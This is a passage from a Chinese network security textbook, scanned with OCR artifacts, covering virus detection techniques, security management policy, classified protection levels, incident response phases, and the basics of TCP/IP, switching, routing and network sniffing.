比较 法 是 用 原始 备份 与 被 检测 的 引导 局 区 或 被 检测 的 文件 进行 比较 。 比 较 时 可 以 靠 
打印 的 代码 清单 (比如 Debug 的 D 命令 输出 格式 ) 进 行 比 较 , 或 用 程序 来 进行 比较 (如 
DOS 的 Diskcomp,FC 或 PCTools 等 其 他 软件 )。 这 种 比较 法 不 需要 专用 的 计算 机 病毒 
检测 程序 ,只 要 用 常规 DOS 软件 和 PCTools 等 工具 软件 就 可 以 进行 。 而 且 用 这 种 比较 
法 还 可 以 发 现 那些 尚 不 能 被 现 有 的 计算 机 病毒 查 毒 程序 发 现 的 计算 机 病毒 。 通 过 代码 分 
Vr ,可 以 判定 某 个 程序 中 是 否 含有 计算 机 病毒 .发现 新 计算 机 病毒 就 必须 依靠 比较 法 和 分 
析 法 一 同 工 作 。 

比较 法 的 优点 是 简单 .方便 ,无 需 专用 软件 ;缺点 是 无 法 确认 计算 机 病毒 的 种 类 名 称 。 
另外 ,造成 被 检测 程序 与 原始 备份 之 间 差 别 的 原因 尚 需 进 一 步 验证 ,以 查 明 是 由 于 计算 机 
病毒 造成 的 ,还 是 由 于 DOS 数据 被 偶然 原因 ,如 突然 停电 、 程 序 失控 .恶意 程序 等 破坏 的 。 
另外 , 当 找 不 到 原始 备份 时 ,用 比较 法 就 不 能 马上 得 到 结论 。 

2. 加 总 比 对 法 

根据 每 个 程序 的 档案 名 称 ` 大小. 时间、 日 期 及 内 容 , 加 总 为 一 个 检查 码 , 再 将 检查 码 
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附 于 程序 的 后 面 , 或 是 将 所 有 检查 码 放 在 同一 个 数据 库 中 ,再 利用 加 总 比 对 系统 ,追踪 并 
记录 每 个 程序 的 检查 码 是 否 遭 更 改 , 以 判断 是 否 感染 了 计算 机 病毒 。 

这 种 技术 可 侦 测 到 各 式 的 计算 机 病毒 ,但 最 大 的 缺点 就 是 误 判 率 高 , 且 无 法 确认 是 哪 
种 计算 机 病毒 感染 的 。 此 外 ,对 于 隐形 计算 机 病毒 无 法 侦 测 到 。 

3. 搜索 法 

搜索 法 是 用 每 一 种 计算 机 病毒 体 含有 的 特定 字符 串 对 被 检测 的 对 象 进行 扫描 。 如 果 
在 被 检测 对 象 内 部 发 现 了 某 一 种 特定 字 节 串 ,就 表明 发 现 了 该 字 节 串 所 代表 的 计算 机 病 
毒 。 国 外 将 这 种 按 搜索 法 工作 的 计算 机 病毒 扫描 软件 称 为 Virus Scanner。 计 算 机 病毒 
扫描 软件 由 两 部 分 组 成 : 一 部 分 是 计算 机 病毒 代码 库 , 含 有 经 过 特别 选 定 的 各 种 计算 机 
病毒 的 代码 串 ; 另 一 部 分 是 利用 该 代码 库 进 行 扫描 的 扫描 程序 。 目 前 常见 的 防 杀 计 算 机 
病毒 软件 对 已 知 计 算 机 病毒 的 检测 大 多 采用 这 种 方法 。 计 算 机 病毒 扫描 程序 能 识别 的 计 
算 机 病毒 的 数目 完全 取决 于 计算 机 病毒 代码 库 内 所 含 计算 机 病毒 的 种 类 多 少 。 显 而 易 
见 , 库 中 计算 机 病毒 代码 种 类 越 多 ,扫描 程序 能 认 出 的 计算 机 病毒 就 越 多 。 

这 种 扫描 法 的 缺点 也 是 明显 的 ,具体 如 下 : 

CD 当 被 扫描 的 文件 很 长 时 ,扫描 所 花 时 间 也 较 多 。 

(2) 新 的 计算 机 病毒 的 特征 串 未 加 入 计算 机 病毒 代码 库 时 , 老 版 本 的 扫 毒 程序 无 法 
识别 出 新 的 计算 机 病毒 。 

(3) 怀 有 恶意 的 计算 机 病毒 制造 者 得 到 代码 库 后 ,会 很 容易 地 改变 计算 机 病毒 体内 
的 代码 ,生成 一 个 新 的 变种 ,使 扫描 程序 失去 检测 它 的 能 力 。 

(4) 容易 产生 误 报 。 

(5) 不 易 识别 多 维 变 形 计算 机 病毒 。 

4. 分 析 法 

分 析 法 常 为 计算 机 病毒 技术 人 员 使 用 。 使 用 分 析 法 的 目的 在 于 : 

(1) 确认 被 观察 的 磁盘 引导 扇 区 和 程序 中 是 否 含有 计算 机 病毒 。 

(2) 确认 计算 机 病毒 的 类 型 ,判定 其 是 否 是 一 种 新 的 计算 机 病毒 。 

(3) 搞 清楚 计算 机 病毒 体 的 大 致 结构 ,提取 特征 识别 用 的 字 节 串 或 特征 字 , 用 于 增添 
到 计算 机 病毒 代码 库 供 计算 机 病毒 扫描 和 识别 程序 用 。 

(4) 详细 分 析 计算 机 病毒 代码 ,制定 相应 的 防 杀 计算 机 病毒 方案 。 

使 用 分 析 法 要 求 具有 比较 全 面 的 有 关 计 算 机 、DOS、Windows、 网 络 等 的 结构 和 功能 
调用 以 及 关于 计算 机 病毒 方面 的 各 种 知识 ,这 是 与 其 他 检测 计算 机 病毒 方法 不 一 样 的 
地 方 。 

除了 要 具有 相关 的 知识 外 ,还 需要 反 汇编 工具 、 二 进 制 文件 编辑 器 等 分 析 用 工具 程序 
和 专用 的 试验 计算 机 。 计 算 机 病毒 检测 的 分 析 法 是 防 杀 计算 机 病毒 工作 中 不 可 缺少 的 重 
要 技术 ,任何 一 个 性 能 优良 的 防 杀 计算 机 病毒 系统 的 研制 和 开发 都 离 不 开 专 门人 员 对 各 
种 计算 机 病毒 的 详尽 而 认真 的 分 析 。 

分 析 的 步 又 分 为 静态 分 析 和 动态 分 析 两 种 。 静 态 分 析 是 指 利用 反 汇 编 工具 将 计算 机 
病毒 代码 打印 成 反 汇编 指令 清单 后 进行 分 析 。 分 析 人 员 具 有 的 素质 越 高 ,分 析 过 程 越 快 ， 
理解 越 深 。 动 态 分 析 则 是 指 利 用 Debug 等 调试 工具 在 内 存 带 毒 的 情况 下 ,对 计算 机 病毒 
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做 动态 跟踪 ,观察 计算 机 病毒 的 具体 工作 过 程 , 以 进一步 在 静态 分 析 的 基础 上 理解 计算 机 
病毒 工作 的 原理 。 

5. 人 工 智能 陷阱 技术 和 宏 病 毒 陷阱 技术 

人 工 智 能 陷阱 是 一 种 监测 计算 机 行为 的 常 驻 式 扫描 技术 。 它 将 所 有 计算 机 病毒 所 产 
生 的 行为 归纳 起 来 ,一 旦 发 现 内 存 中 的 程序 有 任何 不 当 的 行为 ,系统 就 会 有 所 警觉 ,并 告 
知 使 用 者 。 这 种 技术 的 优点 是 执行 速度 快 、 操 作 简便 , 且 可 以 侦 测 到 各 式 计算 机 病毒 ; 缺 
点 是 程序 设计 难 , 且 不 容易 考虑 周全 。 

宏 病 毒 陷阱 技术 (MacroTrap) 是 结合 了 搜索 法 和 人 工 智能 陷阱 技术 , 依 行为 模式 来 
侦 测 已 知 及 未 知 的 宏 病毒 。 其 中 ,配合 OLE2 技术 ,可 将 宏 与 文件 分 开 , 使 得 扫描 速度 变 
得 飞快 ,而 且 更 可 有 效 地 将 宏 病 毒 彻底 清除 。 

6. 软件 仿真 扫描 法 

该 技术 专门 用 来 对 付 多 态 变 形 计算 机 病毒 (polymorphic/mutation virus)。 多 态 变 
形 计算 机 病毒 在 每 次 传染 时 ,都 将 自身 以 不 同 的 随机 数 加 密 于 每 个 感染 的 文件 中 ,传统 搜 
索 法 的 方式 根本 就 无 法 找到 这 种 计算 机 病毒 。 软 件 仿 真 技术 则 是 成 功 地 仿真 CPU 执 
行 , 在 DOS 虚拟 机 (virtual machine) 下 伪 执行 计算 机 病毒 程序 ,安全 并 准确 地 将 其 解密 ， 
再 加 以 扫描 。 

7. 先知 扫描 法 

先知 扫描 技术 (virus instruction code emulation,VICE) 是 继 软 件 仿真 后 的 一 大 技术 
上 的 突破 。 先 知 扫描 技术 将 专业 人 员 用 来 判断 程序 是 否 存在 计算 机 病毒 代码 的 方法 ,分 
析 归 纳 成 专家 系统 和 知识 库 ,再 利用 软件 模拟 技术 (software emulation) 伪 执行 新 的 计算 
机 病毒 ,超前 分 析出 新 计算 机 病毒 代码 ,防范 后 续 的 计算 机 病毒 。 


2.5 网 络 安全 管理 规范 


信息 网 络 运 行 部 门 的 安全 管理 工作 应 首先 研究 确定 网 络 安全 策略 , 即 网 络 安 全 保护 
工作 的 目标 和 对 象 。 网 络 安全 策略 包括 总 体 安全 策略 .应 用 系统 安全 策略 .部门 安 全 策 
略 、 设 备 安全 策略 等 。 


2.5.1 信息 网 络 安 全 策略 


信息 网 络 总 体 安 全 策略 可 以 概括 为 "实体 可 信 , 行 为 可 控 , 资 源 可 管 , 事 件 可 查 ,运行 
可 靠 ”, 总 体 安全 策略 为 其 他 安全 策略 的 制定 提供 总 的 依据 。 

1. 实体 可 信 

实体 指 构成 信息 网 络 的 基本 要 素 , 主 要 有 网 络 基 础 设备 .软件 系统 .用 户 和 数据 。 实 
体 可 信 就 是 保证 构建 网 络 的 基础 设备 和 软件 系统 安全 可 信 , 没 有 预 留 后 门 ;保证 接 和 网络 
的 用 户 是 可 信 的 ,防止 恶意 用 户 对 系统 的 攻击 破坏 ;保证 在 网 络 上 传输 处理、 存储 的 数据 
是 可 信 的 ,防止 搭 线 窃听 、 非 授权 访问 或 恶意 算 改 。 

2. 行为 可 控 

保证 用 户 行为 可 控 , 即 保证 本 地 计算 机 的 各 种 软 硬 件 资源 不 被 非 授权 使 用 或 被 用 于 
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危害 本 系统 或 其 他 系统 的 安全 ;保证 网 络 接 人 可 控 , 即 保证 用 户 接 和 网络 应 严格 受 控 , 用 
户 上 网 必须 得 到 许可 ;保证 网 络 行为 可 控 , 即 保证 网 络 上 的 通信 行为 受到 监视 和 控制 , 防 
止 滥用 资源 ,非法 外 联 、 网 络 攻击 ,非法 访问 和 传播 有 害 信息 等 恶意 事件 的 发 生 。 

3. 资源 可 管 

保证 对 路 由 器 .交换 机 、 服 务 器 、 邮 件 系 统 数据库、 域名 系统 、 安 全 设备 、 密 码 设备 、 交 
换 机 端口 .IP 地 址 .用 户 账号 .服务 端口 等 网 络 资源 进行 统一 管理 。 


4. 事件 可 查 

保证 对 网 络 上 的 各 类 违规 事件 进行 监控 记录 ,确保 日 志 记录 的 完整 性 ,为 安全 事件 稽 
Ж .取证 提供 依据 。 

5. 运行 可 靠 

保证 网 络 在 发 生 自 然 灾 难 或 遭 到 硬 摧毁 时 仍 能 不 间断 运行 ,具有 容 灾 抗 毁 和 备份 恢 
复 能 力 ;保证 能 够 有 效 防范 病毒 和 黑客 的 攻击 所 引起 的 网 络 拥塞 .系统 崩溃 和 数据 丢失 ， 


具有 较 强 的 应 急 响应 和 灾难 恢复 能 力 。 
2.5.2 信息 网 络 管理 机 制 


信息 网 络 安全 管理 坚持 “ 谁 主管 谁 负责 , 谁 运行 谁 负责 ?的 原则 。 

信息 安全 管理 组 织 的 主要 职责 是 : 制定 工作 人 员 守 则 ,安全 操作 规范 和 管理 制度 ,经 
主管 领导 批准 后 监督 执行 ;组 织 进行 信息 网 络 建设 和 运行 安全 检测 检查 ,掌握 详细 的 安全 
资料 ,研究 制定 安全 对 策 和 措施 ;负责 信息 网 络 的 日 常安 全 管理 工作 ;定期 总 结 安全 工作 ， 
并 接受 公安 机 关公 共 信息 网 络 安全 监察 部 门 的 工作 指导 。 

信息 网 络 安全 管理 的 主要 内 容 : 由 主要 领导 负责 的 逐 级 安全 保护 管理 责任 制 ,配备 
专职 或 兼职 的 安全 员 ,各 级 职责 划分 明确 ,并 有 效 开展 工作 ;明确 运行 和 使 用 部 门 的 岗位 
责任 制 ,建立 安全 管理 规章 制度 ;在 职工 群众 中 普及 安全 知识 ,对 重点 岗位 职工 进行 专门 
培训 和 考核 ;采取 必要 的 安全 技术 措施 ;对 安全 保护 工作 有 档案 记录 和 应 急 计 划 ; 定 期 进 
行 安全 检测 、 风 险 分 析 和 安全 隐患 整改 ;实行 信息 安全 等 级 保护 制度 。 

信息 网 络 安全 管理 工作 要 坚持 从 实际 出 发 .保障 重点 的 原则 ,区 分 不 同情 况 ,分 级 ,分 
类 .分 阶段 进行 信息 网 络 安 全 建设 和 管理 。 按 照 (计算 机 信息 系统 安全 保护 等 级 划分 准 
则 》 的 规定 ,我 国 实行 五 级 信息 安全 等 级 保护 。 

第 一 级 : 用 户 自主 保护 级 。 由 用 户 来 决定 如 何 对 资源 进行 保护 ,以 及 采用 何 种 方式 
进行 保护 。 

第 二 级 : 系统 审计 保护 级 。 本 级 的 安全 保护 机 制 支 持 用 户 具有 更 强 的 自主 保护 能 
力 ,特别 是 具有 访问 审 记 能 力 , 即 它 能 创建 、 维 护 受 保护 对 象 的 访问 审计 跟踪 记录 ,记录 与 
系统 安全 相关 的 事件 发 生 的 日 期 时间, 用户 和 事件 类 型 等 信息 ,所 有 和 该 事件 相关 的 操 
作 都 能 够 被 记录 下 来 ,以 便当 系统 发 生 安全 问题 时 ,可 以 根据 审计 记录 ,分 析 追 查 事故 责 
ЕЛ. 

第 三 级 : 安全 标记 保护 级 。 具 有 第 二 级 系统 审计 保护 级 的 所 有 功能 ,并 对 访问 者 及 
其 访问 对 象 实施 强制 访问 控制 。 通 过 对 访问 者 和 访问 对 象 指定 不 同安 全 标记 ,限制 访问 
者 的 权限 。 

. 43 。 


第 四 级 : 结构 化 保护 级 。 将 前 三 级 的 安全 保护 能 力 扩展 到 所 有 访问 者 和 访问 对 象 ， 
支持 形式 化 的 安全 保护 策略 。 其 本 身 构造 也 是 结构 化 的 ,以 使 之 具有 相当 的 抗 渗透 能 力 。 
本 级 的 安全 保护 机 制 能 够 使 信息 系统 实施 一 种 系统 化 的 安全 保护 。 

第 五 级 : 访问 验证 保护 级 。 具 备 第 四 级 的 所 有 功能 ,还 具有 仲裁 访问 者 能 和 否 访问 某 
些 对 象 的 能 力 。 为 此 ,本 级 的 安全 保护 机 制 不 能 被 攻击 .被 算 改 ,具有 极 强 的 抗 渗透 能 力 。 

计算 机 信息 系统 安全 等 级 保护 标准 体系 包括 信息 系统 安全 保护 等 级 划分 标准 、 等 级 
设备 标准 、 等 级 建设 标准 、 等 级 管理 标准 等 ,是 实行 等 级 保护 制度 的 重要 基础 。 


2.5.3 安全 事件 响应 机 制 


从 用 户 的 角度 看 ,安全 事件 包括 个 人 隐私 或 商业 利益 的 信息 在 网 络 上 受到 侵犯 ,其 他 
人 或 竞争 对 手 利 用 窃听 、 冒 充 、 自 改 ,抵赖 等 手段 侵犯 用 户 的 利益 和 隐私 ,破坏 信息 的 机 密 
性 、 完 整 性 和 真实 性 。 

从 网 络 运行 和 管理 者 角度 来 看 ,安全 事件 是 对 本 地 网 络 信息 的 访问 . 读 写 等 操作 ,出 
现 病毒 .非法 存 取 、 拒 绝 服务 和 网 络 资源 非法 占用 和 非法 控制 等 威胁 ,或 遭受 网 络 黑客 的 
攻击 。 

从 保密 部 门 来 看 ,安全 事件 则 是 国家 重要 信息 泄露 ,对 社会 产生 危害 ,对 国家 造成 巨 
大 损失 。 

从 社会 教育 和 意识 形态 角度 来 看 ,在 网 络 上 传播 不 健康 的 内 容 , 对 社会 稳定 和 人 类 发 
展 造成 阻碍 等 都 是 安全 事件 。 

从 网 络 运行 和 管理 来 看 ,安全 事件 的 响应 处 置 包括 六 个 阶段 。 

CD 准备 阶段 : 基于 威胁 建立 一 组 合理 的 防范 .控制 措施 ,建立 一 组 尽 可 能 高 效 的 事 
件 处 理 程序 ,获得 处 理 问题 必需 的 资源 和 人 员 ,最 终 建立 应 急 响 应 体系 。 

(2) 检测 阶段 : 进行 技术 检测 ,获取 完整 的 系统 备份 ,进行 系统 审计 ,分 析 异 常 现象 ， 
评估 事件 范围 ,报告 事件 。 

(3) 控制 阶段 : 制定 可 能 的 控制 策略 ,拟定 详细 的 控制 措施 实施 计划 ,对 控制 措施 进 
行 评估 和 选择 ,记录 控制 措施 的 执行 。 

(4) 根除 阶段 : 查找 出 事件 根源 并 根除 ,确认 备份 系统 的 安全 ,记录 和 报告 。 

(5) 恢复 阶段 : 根据 事件 情况 ,从 保存 完好 的 介质 上 恢复 系统 ,一 次 完整 的 恢复 应 包 
括 修改 所 有 用 户口 令 。 

(6) 追踪 阶段 : 回顾 并 整合 发 生 事件 ,对 事件 进行 一 次 事后 分 析 ,为 下 一 步 进行 的 民 
事 或 刑事 的 法 律 活动 提供 有 用 的 信息 。 
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第 3 章 网 络 分 析 实 验 


3.1 网 络 分 析 原 理 


3.1.1 TCP/IP 原理 


TCP/IP 是 一 个 四 层 协 议 系 统 ,TCP/IP 协议 族 是 一 组 不 同 的 协议 组 合 在 一 起 构成 的 
协议 族 。 

数据 发 送 时 自 上 而 下 , 层 层 加 码 ;数据 接收 时 自 下 而 上 , 层 层 解码 。 

如 图 3. 1 所 示 , 当 应 用 程序 用 ТСР 传送 数据 时 ,数据 被 送 入 协议 栈 中 ,然后 逐 层 通过 
直到 被 当做 一 串 比特 流 送 入 网 络 。 每 一 层 对 收 到 的 数据 都 要 增加 一 些 首部 信息 (有 时 还 
要 增加 尾部 信息 )。TCP 传 给 IP 的 数据 单元 称 做 TCP 报 文 段 。IP 传 给 网 络 接口 层 的 数 
据 单元 称 做 IP 数据 报 。 通 过 以 太 网 传输 的 比特 流 称 做 帧 。 


用 户 数据 
i | 应 用 程序 
m | 用 户 数据 | 
i | TCP 
TCP 首 部 应 用 数据 | 
m TCP 段 = IP 
IP 首 部 ”| TCP 首 部 应 用 数据 mm 
КОШ 


以 太 网 帧 | 
46-1500 15 | 


图 31 TCRPIP 协 议 系 统 


垂直 方向 是 当今 普遍 认可 的 数据 处 理 的 功能 流程 。 每 一 层 都 有 与 其 相 邻 层 的 接口 。 
为 了 通信 ,系统 必须 在 各 层 之 间 传 递 数 据 ,指令 .地址 等 信息 ,通信 的 逻辑 流程 与 真正 的 数 
据 流 不 同 ,虽然 通信 流程 垂直 通过 各 层次 ,但 每 一 层 都 在 逻辑 上 与 远程 计算 机 系统 的 相应 
协议 层 直接 通信 。 如 图 3.2 所 示 ,通信 实际 上 是 按 垂直 方向 进行 的 ,但 在 迎 辑 上 通信 是 在 
同 层 进行 的 。 
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图 32 逻辑 通信 结构 


3.1.2 交换 技术 


所 谓 交 换 ,就 是 将 分 组 (或 帧 ) 从 一 个 端口 转移 到 另 一 端口 的 动作 。 交 换 机 在 操作 过 
程 中 不 断 地 收集 资料 去 建立 它 本 身 的 一 个 地 址 表 , MAC 地 址 表 显 示 了 主机 的 MAC 地 址 
与 以 太 网 交换 机 端口 的 映射 关系 ,指出 数据 帧 去 往 的 目标 主机 。 

当 以 太 网 交换 机 收 到 一 个 数据 帧 时 ,将 数据 帧 的 目的 MAC 地 址 与 MAC 地 址 表 进 
行 查找 匹配 。 如 果 在 MAC 地 址 表 中 没有 相应 的 匹配 项 , 则 向 除 接收 端口 外 的 所 有 端口 
广播 该 数据 帧 。 当 MAC 地 址 表 中 有 匹配 项 时 ,该 匹配 项 指定 的 交换 机 端口 与 接收 端口 
相同 则 表明 该 数据 帧 的 目的 主机 和 源 主机 在 同一 广播 域 中 ,不 通过 交换 机 也 可 以 完成 通 
信 ,交换 机 将 丢弃 该 数据 帧 。 和 否则 ,交换 机 把 该 数据 帧 转发 到 相应 的 端口 。 

交换 机 检查 收 到 数据 帧 的 源 МАС 地 址 ,并 查找 MAC 地 址 表 中 与 之 相 匹 配 的 项 。 
如 果 没 有 ,交换 机 将 记录 该 MAC 地 址 和 接收 该 数据 帧 的 端口 ,并 激活 一 个 定时 器 。 这 个 
过 程 被 称 做 地 址 学 习 ; 而 如 果 接 收 的 数据 帧 的 源 МАС 地 址 在 地 址 表 中 有 匹配 项 ,交换 机 
将 复位 该 地 址 的 定时 器 。 如 果 交 换 机 不 能 正确 学 习 MAC 地 址 , 则 有 可 能 造成 数据 包 丢 
失 以 及 泛 洪 现象 的 发 生 ,影响 交换 机 的 转发 性 能 。 

局 域 网 交换 技术 是 作为 对 共享 式 局 域 网 提供 有 效 的 网 段 划分 的 解决 方案 ,可 以 使 用 
户 尽 可 能 地 分 享 到 最 大 带宽 。 交 换 技 术 在 OS 七 层 网 络 模 型 中 的 第 二 层 , 即 数据 链 路 层 
进行 操作 ,交换 机 对 数据 包 的 转发 建立 在 MAC 地 址 基础 上 ,对 于 IP 网 络 协议 来 说 , 它 是 
透明 的 , 即 交换 机 在 转发 数据 包 时 ,无 须知 道 信 源 机 和 目标 机 的 IP 地 址 ,只 须知 道 其 物理 
地 址 。 


3.1.3 路 由 技术 


路 由 是 指 通过 相互 联接 的 网 络 把 信息 从 源 地 点 移动 到 目标 地 点 的 过 程 。 在 路 由 过 程 

中 ,信息 至 少 会 经 过 一 个 或 多 个 中 间 节 点 。 路 由 和 交换 所 实现 的 功能 类 似 , 但 二 者 的 区 别 

是 明显 的 : 交换 发 生 在 OSI 参考 模型 的 第 二 层 (数据 链 路 层 ) ,而 路 由 发 生 在 第 三 层 , 即 网 
。46 。 


络 层 。 这 一 区 别 决定 了 路 由 和 交换 在 传输 信息 的 过 程 中 需要 使 用 不 同 的 控制 信息 。 

当 IP 子 网 中 的 一 台 主 机 发 送 TP 分 组 给 同一 子 网 的 另 一 台 主 机 时 , 它 将 直接 把 IP 分 
组 送 到 网 络 上 ,对 方 就 能 收 到 。 当 发 送 给 不 同 子 网 上 的 主机 时 , 它 要 选择 一 个 能 到 达 目 的 
子 网 上 的 路 由 器 ,把 IP 分 组 传递 给 该 路 由 器 ,由 路 由 器 负责 把 IP 分 组 送 到 目的 地 。 如 果 
没有 这 样 的 路 由 器 ,主机 就 把 IP 分 组 送 给 一 个 被 称 为 “默认 网 关 ? 的 路 由 器 .“ 默 认 网 关 ?” 
是 每 台 主机 上 的 一 个 配置 参数 , 它 是 同一 个 网 络 上 的 某 个 路 由 器 端口 的 ТР 地 址 。 

同 主机 一 样 , 路 由 器 也 要 判定 端口 连接 的 是 否 为 目的 子 网 ,如 果 是 ,就 直接 把 分 组 通 
过 端口 送 到 网 络 上 ,和 否则 ,也 要 选择 下 一 个 路 由 器 来 传送 分 组 。 路 由 器 也 有 它 的 默认 网 
关 , 用 来 传送 IP 分 组 ,通过 逐 级 传送 ,IP 分 组 最 终 将 送 到 目的 地 ,否则 TP 分 组 被 网 络 
ER. 

路 由 器 不 仅 负责 IP 分 组 转发 ,还 需 与 其 他 路 由 器 联络 ,确定 网 络 的 路 由 选择 和 维护 
路 由 表 。 路 由 包含 两 个 基本 的 动作 : 选择 最 佳 路 径 和 通过 网 络 传输 信息 。 在 路 由 过 程 
中 ,后 者 也 称 为 (数据 ) 交 换 。 交 换 相 对 来 说 比较 简单 ,而 选择 路 径 很 复杂 。 

路 径 选 择 是 判定 到 达 目 的 地 的 最 佳 路 径 , 由 路 由 选择 算法 来 实现 。 由 于 涉及 不 同 的 
路 由 选择 协议 和 路 由 选择 算法 ,要 相对 复杂 一 些 。 为 了 判定 最 佳 路 径 ,路 由 选择 算法 必须 
启动 并 维护 包含 路 由 信息 的 路 由 表 , 其 中 路 由 信息 依赖 于 所 用 的 路 由 选择 算法 。 

Metric 是 路 由 算法 用 以 确定 到 达 目 的 地 的 最 佳 路 径 的 计量 标准 。 路 由 算法 根据 许 
多 信息 来 填充 路 由 表 。 路 由 器 查看 了 数据 包 的 目的 协议 地 址 后 ,确定 是 否 知道 如 何 转发 
该 包 。 如 果 路 由 器 不 知道 如 何 转 发 ,通常 就 将 之 丢弃 。 如 果 路 由 器 知道 如 何 转发 ,就 把 目 
的 物理 地 址 变 成 下 一 跳 的 物理 地 址 并 向 之 发 送 。 下 一 跳 可 能 就 是 最 终 的 目的 主机 ,如 果 
不 是 ,通常 为 另 一 个 路 由 器 , 它 将 执行 同样 的 步骤 。 


3.1.4 网 络 嗅 探 技 术 


3.1.4.1 嗅 探 技 术 简介 

嗅 探 (sniffer) 技 术 是 一 种 重要 的 网 络 安全 攻防 技术 。 对 黑客 来 说 ,通过 嗅 探 技 术 能 
以 非常 隐蔽 的 方式 抽取 网 络 中 的 大 量 敏 感 信息 。 与 主动 扫描 相 比 , 嗅 探 行 为 更 难 被 察觉 ， 
也 更 容易 操作 。 对 安全 管理 人 员 来 说 ,借助 嗅 探 技术 ,可 以 对 网 络 活动 进行 实时 监控 ,发 
现 各 种 网 络 攻击 行为 。 嗅 探 技术 最 初 是 作为 网 络 管理 员 检 测 网 络 通信 的 必 备 技术 , 既 可 
以 是 软件 ,又 可 以 是 一 个 硬件 设备 。 软 件 Sniffer 应 用 方便 ,针对 不 同 的 操作 系统 平台 都 
有 多 种 不 同 的 软件 Sniffer; 硬 件 Sniffer 通常 被 称 做 协议 分 析 器 ,其 价格 一 般 都 很 高 昂 。 

在 局 域 网 中 ,由 于 以 太 网 的 共享 特性 决定 了 嗅 探 能 够 成 功 。 因 为 以 太 网 是 基于 广播 
方式 传送 数据 的 ,所 有 的 物理 信号 都 会 被 传送 到 每 一 个 主机 节点 ,此 外 ,网 卡 可 以 被 设置 
成 混杂 接收 模式 ,在 这 种 模式 下 ,无 论 监听 到 的 数据 帧 目的 地 址 如 何 , 网 卡 都 能 予以 接收 。 
而 TCP/IP 协议 栈 中 的 应 用 协议 大 多 数 以 明文 形式 在 网 络 上 传输 ,在 这 些 明 文 数据 中 往 
往 包 含 一 些 敏 感 信息 (如 账号 .密码 等 ) ,使 用 Sniffer 可 以 监听 到 所 有 局 域 网 内 的 数据 通 
信 ,并 得 到 这 些 敏感 信息 。 

Sniffer 的 隐蔽 性 好 , 它 只 是 被 动 接收 数据 ,不 向 外 发 送 数 据 , 所 以 在 传输 数据 过 程 
中 ,根本 无 法 察觉 。Sniffer 的 局 限 性 是 只 能 在 局 域 网 的 冲突 域 中 进行 ,或 者 是 在 点 到 点 
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连接 的 中 间 节 点 上 进行 监听 。 


3.1.4.2 网 络 嗅 探 器 

网 络 嗅 探 器 在 当前 网 络 技术 中 使 用 得 非常 广泛 。 网 络 嗅 探 器 既 可 以 作为 网 络 故障 的 
诊断 工具 ,也 可 以 作为 监听 工具 。 传 统 的 网 络 嗅 探 技 术 是 被 动 地 监听 网 络 通信 、 用 户 名 和 
口令 ,而 新 的 网 络 嗅 探 技 术 开 始 主动 地 控制 通信 和 数据。 大 多 数 的 嗅 探 器 至 少 能 够 分 析 下 
面 的 协议 ; 标准 以 太 网 .TCP/IP、IPX、DECNET 等 。 

根据 功能 不 同 , 嗅 探 器 可 以 分 为 通用 网 络 嗅 探 器 和 专用 嗅 探 器 。 前 者 支持 多 种 协议 ， 
如 Tepdump,Snifferit 等 ;后 者 一 般 是 针对 特定 软件 或 提供 特定 功能 ,如 专门 针对 MSN 
等 即时 通信 软件 的 嗅 探 器 .专门 嗅 探 邮 件 密 码 的 嗅 探 器 等 。 


3.1.4.3. 嗅 探 技 术 分 类 

根据 工作 环境 和 工作 原理 不 同 , 嗅 探 技 术 又 可 以 分 为 本 机 嗅 探 .广播 网 嗅 探 ,交换 机 

1. 本 机 嗅 探 

本 机 嗅 探 是 指 在 某 台 计算 机 内 , 嗅 探 程 序 通 过 某 种 方式 ,获取 发 送 给 其 他 进程 的 数据 
包 的 过 程 。 例 如 , 当 邮 件 客户 端 在 收发 邮件 时 , 嗅 探 程序 可 以 窃听 到 所 有 的 交互 过 程 和 其 
中 传递 的 数据 。 

2. 广播 网 嗅 探 

广播 网 是 基于 集线器 (Hub) 的 局 域 网 络 ,其 工作 原理 是 基于 总 线 方式 的 ,所 有 的 数据 
包 在 该 网 络 中 都 会 被 广播 发 送 ( 即 发 送 给 所 有 端口 )。 在 广播 网 中 ,每 一 个 网 络 数据 包 都 
被 发 送 到 所 有 的 端口 ,然后 由 各 端口 所 连接 的 网 卡 来 判断 是 否 需要 接收 ,所 有 目的 地 址 与 
网 卡 实际 地 址 不 符 的 数据 包 将 被 网 卡 驱 动 自动 丢弃 ,这 确保 了 广播 网 中 每 台 主 机 只 接收 
到 以 自己 为 目标 的 数据 包 。 

广播 网 嗅 探 利用 了 广播 网 “共享 ”的 通信 方式 。 在 广播 网 中 所 有 的 网 卡 都 会 收 到 所 有 
的 数据 包 , 只 要 将 本 机 网 卡 设 为 混杂 模式 ,就 可 以 使 嗅 探 工具 支持 广播 网 或 多 播 网 的 
嗅 探 。 

3. 交换 机 嗅 探 

交换 机 的 工作 原理 与 Hub 不 同 , 它 不 再 将 数据 包 转 发 给 所 有 的 端口 ,而 是 通过 “分 组 
交换 ”的 方式 进行 单 对 单 的 数据 传输 。 即 交换 机 能 记 住 每 个 端口 的 MAC 地 址 ,根据 数据 
包 的 目的 地 址 选择 目的 端口 ,只 有 对 应 该 目的 地 址 的 网 卡 能 接收 到 数据 。 

基于 交换 机 的 嗅 探 是 指 在 交换 环境 中 ,通过 某 种 方式 进行 的 嗅 探 。 由 于 交换 机 基于 
“分 组 交换 ?的 工作 模式 ,因此 ,简单 地 将 网 卡 设 为 “混杂 ”模式 并 不 能 嗅 探 到 网 络 上 的 数据 
包 , 必 须 采 用 其 他 方法 来 实现 基于 交换 机 的 嗅 探 。 

4. 端口 镜像 嗅 探 

端口 镜像 也 称 做 巡回 分 析 端 口 (roving analysis port) , 它 从 网 络 交换 机 的 一 个 端口 转 
发 每 个 进出 分 组 的 拷贝 到 另 一 个 端口 ,分 组 将 在 此 端口 进行 分 析 ,端口 镜像 是 监视 网 络 通 
信 量 和 通信 内 容 的 一 种 方法 。 网 络 管理 员 将 端口 镜像 作为 一 种 诊断 或 调试 的 工具 ,尤其 
是 在 分 析 网 络 情况 的 时 候 , 它 使 管理 员 能 跟踪 交换 机 的 性 能 并 在 必要 时 对 其 更 改 。 
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端口 镜像 是 交换 机 为 调试 预 留 的 功能 。 通 过 端口 镜像 ,可 以 将 交换 机 中 任意 端口 的 
数据 复制 给 镜像 端口 ,本 机 嗅 探 工具 就 可 以 嗅 探 交换 机 上 的 任意 端口 了 。 

基于 端口 镜像 的 嗅 探 受 限于 交换 机 能 够 支持 的 镜像 功能 ,能 够 镜像 多 少 端口 .镜像 出 
